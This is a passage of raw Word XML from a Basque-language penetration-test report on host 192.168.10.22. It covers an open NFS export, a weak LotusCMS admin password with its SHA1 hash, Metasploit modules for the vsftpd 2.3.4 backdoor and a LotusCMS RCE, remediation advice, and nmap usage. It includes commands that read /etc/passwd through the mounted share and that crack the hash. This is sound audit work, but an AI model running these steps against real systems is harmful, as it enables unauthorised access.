          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>3. Datu sentikorren sarbidea (irakurketa egiaztatua):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Courier New" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ ls /tmp/nfs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bin boot etc home lib media mnt opt proc root ...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$ cat /tmp/nfs/etc/passwd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root:x:0:0:root:/root:/bin/bash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www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin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[...sistema erabiltzaile guztiak...]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ahultasunaren zergatia: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/ direktorioa * (edozein IP) esportatua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 xml:space="preserve">root_squash ez aktibatua → idazketa-sarbide arriskua dago (proba honetan ez da idazketarik egiaztatu, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>irakurketa bakarrik)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Autentifikaziorik ez</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Gomendazioa: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NFS esportazioak mugatu /etc/exports fitxategian, root_squash aktibatu, eta sarbidea IP baimenduetara soilik mugatu. Beharrezkoa ez bada, NFS zerbitzua guztiz desgaitu. Firewall bidez 111 eta 2049 port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>uak blokeatu kanpoko saretik.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="280" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>4.4. HTTP Zerbitzua (80/TCP) — LotusCMS Admin — Pasahitz Ahula</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="9240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57"/>
        <w:gridCol w:w="6183"/>
      </w:tblGrid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Kategoria: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Autentifikazio Ahula / Pasahitz Ahula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Arrisku Maila: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Cs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ALTUA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Hash mota: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SHA1 gatz gabe (40 karaktere)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Pasahitza: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Admin123 (oso arrunta)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Deskribapena: admin.dat fitxategian gordetako SHA1 hash-a (gatz gabe), 4.1 atalean LotusCMS-eko RCE bidez eskuratua, erraz identifika daiteke. Gainera, pasahitza oso arrunta da (Admin123), eta indar gordineko eraso erraz batean ere azalduko litzateke.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Hash-a (4.1 ataleko RCE bidez eskuratua):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Courier New" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>administrator:9cb3b0f16b861d3c9a198c30d5f873c344937d2c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Identifikazio metodoa (offline cracking):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Courier New" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ echo 'Admin123' | sha1sum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9cb3b0f16b861d3c9a198c30d5f873c344937d2c  -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eastAsia="Courier New" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># (Edo CrackStation bezalako online tresnak e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Courier New" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rabiliz)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Hash-a eta pasahitza bat etorri direnez, kredentziala baliozkotu eta admin panelean sartu da (ikus 4.1 atala).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Gomendazioa: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Pasahitz politika sendo bat ezarri (gutxienez 12 karaktere, maiuskula, zenbakia eta karaktere berezia). Hash algoritmoa ald</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>atu bcrypt edo Argon2 erabilerara, salt-arekin. Bi faktoreko autentifikazioa (2FA) ezarri admin panelerako.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="360" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5. ERASO MOTAK (TIPOS DE ATAQUE)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Auditorian zehar hiru eraso-mota nagusi erabili dira, bakoitza fase eta helburu jakin batekin lotuta:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="9240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49"/>
        <w:gridCol w:w="2487"/>
        <w:gridCol w:w="1281"/>
        <w:gridCol w:w="3623"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872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Eraso Mota</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520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Tr</w:t>
            </w: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esna / Teknika</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1296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Fasea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3672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Helburua eta Emaitza</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872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Urruneko Kode-Exekuzioa (RCE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520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Metasploit — lcms_php_exec (CVE-2012-1623)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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4. Fasea (Web Ustiapena)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3672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LotusCMS-en bidez PHP kodea urrunetik exekutatu → Meterpreter sesioa eta kredentzialen hash-a eskuratu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D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Backdoor Ustiapena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Metasploit — vsftpd_234_backdoor (CVE-2011-2523)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5. Fasea (FTP Ustiapena)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Autentifikazio gabeko root shell zuzena lortu, portu 6200an</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872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Konfigurazio Okerraren Ustiapena</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520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showmount + mount (NFS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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6. Fasea (NFS Esplotazioa)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3672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Autentifikaziorik gabe fitxategi-sistema osora sarbidea lortu (irakurketa egiaztatua)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>6. AHULTASUN MOTAK (TIPOS DE VULNERABILIDAD)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/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Aurkitutako 4 ahultasunak hiru kategoria nagusitan sailka daitezke:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="8640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31"/>
        <w:gridCol w:w="2325"/>
        <w:gridCol w:w="1204"/>
        <w:gridCol w:w="3380"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872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Ahultasun Mota</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520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Adibidea (Zerbitzua)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1296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CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3672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Jatorria eta Konponbidea</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872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Software / Kodearen Ahultasuna (RCE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520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LotusCMS 3.0 (eval() funtzioa)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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CVE-2012-1623</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3672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Sarrera ez-sanitizatua → eguneratu / sanitizatu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D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Backdoor / Atzeko Atea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vsftpd 2.3.4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CVE-2011-2523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Kode gaiztoa iturburuan → bertsio segurura eguneratu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872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Konfigurazio Okerra eta Kudeaketa Ahula</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520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NFS (esportazio mugagabea) + Admin pasahitz ahula/hash babesgabea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3672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Konfigurazio/pasahitz-politika falta → NFS murriztu + root_squash, pasahitz sendoa + bcrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7. ARRISKUEN LABURPENA</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="8640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8"/>
        <w:gridCol w:w="2259"/>
        <w:gridCol w:w="1665"/>
        <w:gridCol w:w="3578"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1224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Portua</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2448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Ahultasuna</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800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CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888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20"/>
              </w:rPr>
              <w:t>Arriskua</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="122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21/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="244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vsftpd 2.3.4 Backdoor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CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="388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Cs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>KRITIKOA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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80/tcp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LotusCMS 3.0 RCE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CVE-2012-1623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Cs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>KRITIKOA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="122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111+2049</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="244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NFS Fitxategi Sistema Osoa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Konfigurazio Okerra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="388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Cs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>KRITIKOA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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80/tcp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Admin Pasahitz Ahula / Hash Babesgabea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color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>—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rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ALTUA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>8. ONDORIOAK ETA GOMENDIOAK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192.168.10.22 zerbitzariak oso arriskutsu sailkaturiko ahultasun anitz ditu. Bi ahultasunek zuzenean eta inolako pribilegio-eskalatze urratsik gabe root mailako sarbidea eman dute (vsftpd backdoor eta NFS-ren bidezko fitxategi-sistemarako sarbidea autentif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ikazio gabe). LotusCMS-eko RCE-k, berriz, hasierako urruneko kode-exekuzioa ahalbidetu zuen web-erabiltzaile mailan (ez root), eta horren bidez lapurtutako kredentzialak erabili ziren admin panelerako sarbidea lortzeko. Sistema guztia arriskuan dago eta be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>rehalako neurriak hartu behar dira.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lehentasunezko Ekintzak (Berehalakoa):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1. vsftpd 2.3.4 bertsio seguru batekin ordezkatu edo FTP zerbitzua desgaitu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2. NFS esportazioak mugatu eta root_squash aktibatu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3. LotusCMS eguneratu edo web aplikazioa ordezkatu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4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Admin pasahitza aldatu eta SHA1 → bcrypt hashera migratu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Epe Ertain-ko Ekintzak (1-4 aste):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5. Firewall arauen berrikuspena eta portu sarbideen murrizketa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6. IDS/IPS sistema ezarri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7. Erregistro eta monitorizazio sistema ezarri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8. Pentesting erregularra planifikatu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:widowControl/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Eranskina C Pentesting faseak eta tresnak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>PENTESTING FASEAK ETA TRESNAK — HACKING ETIKOA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Pentesting auditoretza batean erabilitako fase eta tresnen laburpena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Kasu Praktikoa: 192.168.10.22 — 2026-10-02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Metodologia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Kutxa</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> Grisa (Gray Box)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Fase kop.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6 fase nagusi (Pribilegio-Eskalatzea barne) + Post-Exploitation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Tresna nagusiak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Nmap, dirb, Metasploit, showmount, sha1sum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Ahultasun kopurua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4 (3 Kritiko + 1 Altua)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Gehienezko sarbidea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 xml:space="preserve">root — Sistema osoa kontrolatua </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>(backdoor bidez, pribilegio-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>eskalatzerik gabe)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p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>1. FASEA: INFORMAZIO BILKETA ETA ESKANEATZE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Helburua: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Zerbitzariaren erabilgarritasuna egiaztatu eta irekitako portuak, zerbitzuak eta bertsio zehatzak identifikatu.</w:t>
      </w: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t>1 Nmap — Sareko Eskaneatze Tresna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Tresna: Nmap 7.93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Zer da: Nmap (Network Mapper) sareko eskaneatze tresna da. Portu irekiak, zerbitzuak, bertsioak eta sistema eragilea detektatzeko erabiltzen da.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Erabilitako komandoa:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepLines/>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$ nmap -sV -sC -oN scan.txt 192.168.10.22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Emaitz nagusiak:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepLines/>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>21/tcp -&gt; vs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ftpd 2.3.4 (FTP, Anonymous login baimendua)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>22/tcp -&gt; OpenSSH 8.2p1 (Ubuntu) (SSH)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>80/tcp -&gt; Apache httpd 2.4.41 (Ubuntu) (HTTP)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>111/tcp -&gt; rpcbind 2-4 (RPC #100000)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>2049/tcp-&gt; nfs_acl, NFS v3 (RPC #100227)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>2. FASEA: WEB ENUMERAZIOA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Helburua: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Web zerbitzar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ian ezkutuko direktorioak, fitxategiak eta web aplikazioak aurkitu.</w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>2 dirb — Web Direktorioen Bilatzaile Automatikoa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Tresna: dirb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Zer da: dirb web content bilatzaile bat da. Hitz-zerrenda baten bidez web zerbitzarian direktorio eta fitxategien bilaketa aut</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>omatikoa egiten du, HTTP erantzunak aztertuz.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Erabilitako komandoa:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepLines/>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
